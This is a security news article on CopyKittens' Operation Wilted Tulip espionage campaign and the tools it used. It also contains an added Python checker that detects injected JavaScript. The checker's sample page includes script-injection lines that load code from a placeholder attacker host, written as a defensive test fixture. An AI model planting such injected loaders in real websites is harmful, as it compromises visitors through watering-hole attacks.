
Experts detailed the new Operation Wilted Tulip campaign of the CopyKittens APT


Researchers from ClearSky and Trend Micro uncovered a new massive cyber espionage campaign conducted by CopyKittens dubbed ‘Operation Wilted Tulip’

A joint investigation conducted by experts from the Israeli cyber-intelligence firm ClearSky and Trend Micro uncovered a new massive cyber espionage campaign dubbed ‘Operation Wilted Tulip’, conducted by the Iran-linked APT group CopyKittens (aka Rocket Kittens).

CopyKittens report

The hackers targeted government and academic organizations in various countries; according to the experts, the group has been active since at least 2013.

In 2015, ClearSky detected new activity from the Rocket Kitten APT group against 550 targets, most of which were located in the Middle East.

The CopyKittens hackers targeted organisations and individuals in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany.

The joint report published by ClearSky and Trend Micro includes details on Operation Wilted Tulip and describes the TTPs (tactics, techniques, and procedures) adopted by the Rocket Kittens APT group.

“CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date, and are analyzed in this report: TDTESS backdoor; Vminst, a lateral movement tool; NetSrv, a Cobalt Strike loader; and ZPP, a files compression console program. The group also uses Matryoshka v1, a self-developed RAT analyzed by ClearSky in the 2015 report, and Matryoshka v2 which is a new version, albeit with similar functionality. The group often uses the trial version of Cobalt Strike, a publicly available commercial software for “Adversary Simulations and Red Team Operations.”” states the report.

“Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, “a PowerShell and Python post-exploitation agent.” For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap.”

The hackers used both spear phishing attacks and watering holes to compromise target systems.

CopyKittens compromised websites of media outlets and organizations to deliver its malware. Among the websites compromised by the hackers to conduct watering hole attacks are The Jerusalem Post, the Maariv news site and the IDF Disabled Veterans Organization.

Below is the full list of methods used by CopyKittens in its campaigns.

  • Watering hole attacks – inserting malicious JavaScript code into breached strategic websites.
  • Web based exploitation – emailing links to websites built by the attackers and containing known exploits.
  • Malicious documents – email attachments containing weaponized Microsoft Office documents.
  • Fake social media entities – fake personal and organizational Facebook pages are used for interaction with targets and for information gathering.
  • Web hacking – Havij, Acunetix and sqlmap are used to detect and exploit internet-facing web servers.
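The first item in the list, malicious JavaScript inserted into breached websites, is the one a site operator can catch on their own pages. The following is an added defender-side example, not code from the ClearSky/Trend Micro report or from Security Affairs: it parses a page, lists every script it loads, and flags external script hosts outside an allowlist and inline scripts whose hash is not in a known-good set. The allowlist, the hash set, the sample page and the host name `attacker-placeholder.invalid` are all constructed for the example.

```python
"""
Baseline check for injected JavaScript on a web page.

Added illustrative example (not from the report). Assumptions, all
constructed for this example: the site operator keeps an allowlist of
third-party script hosts and a set of SHA-256 hashes of the inline
scripts they deploy; any script outside both is reported for review.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of <script src="...">
        self.inline = []     # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands script content to handle_data as raw text.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def sha256_hex(text):
    """Hex SHA-256 of a UTF-8 string; used to fingerprint inline scripts."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def find_injected_scripts(html, allowed_hosts, known_inline_hashes):
    """Return a list of (kind, detail) findings for scripts outside the
    baseline. kind is 'external' (src host not allowlisted) or 'inline'
    (body hash not in known_inline_hashes). Externals are listed first."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).netloc.lower()
        # Absolute and protocol-relative URLs carry a host; relative paths
        # are served by the site itself and are treated as first-party.
        if host and host not in allowed_hosts:
            findings.append(("external", src))
    for body in collector.inline:
        if body and sha256_hex(body) not in known_inline_hashes:
            findings.append(("inline", body[:60]))
    return findings


# Constructed sample page: first-party and allowlisted scripts, one known
# inline snippet, plus two injected scripts pointing at a placeholder host.
SAMPLE_PAGE = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/analytics.js"></script>
<script>console.log("site boot");</script>
<script src="//attacker-placeholder.invalid/loader.js"></script>
<script>var s=document.createElement('script');s.src='//attacker-placeholder.invalid/x.js';document.head.appendChild(s);</script>
</head><body></body></html>
"""

ALLOWED_HOSTS = {"cdn.example.net"}
KNOWN_INLINE_HASHES = {sha256_hex('console.log("site boot");')}

if __name__ == "__main__":
    for kind, detail in find_injected_scripts(SAMPLE_PAGE, ALLOWED_HOSTS,
                                              KNOWN_INLINE_HASHES):
        print(f"[{kind}] {detail}")
```

Run periodically against the rendered pages of a site (or against a crawl), the check reduces watering hole detection to a diff against a baseline; the hash set has to be refreshed whenever legitimate inline scripts change, otherwise every deploy produces false positives.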

The hackers used multiple tools and malware to infect targets, relying on both custom malicious code and commercial solutions like Cobalt Strike.

Enjoy the report!


Pierluigi Paganini

(Security Affairs – CopyKittens, cyber espionage)
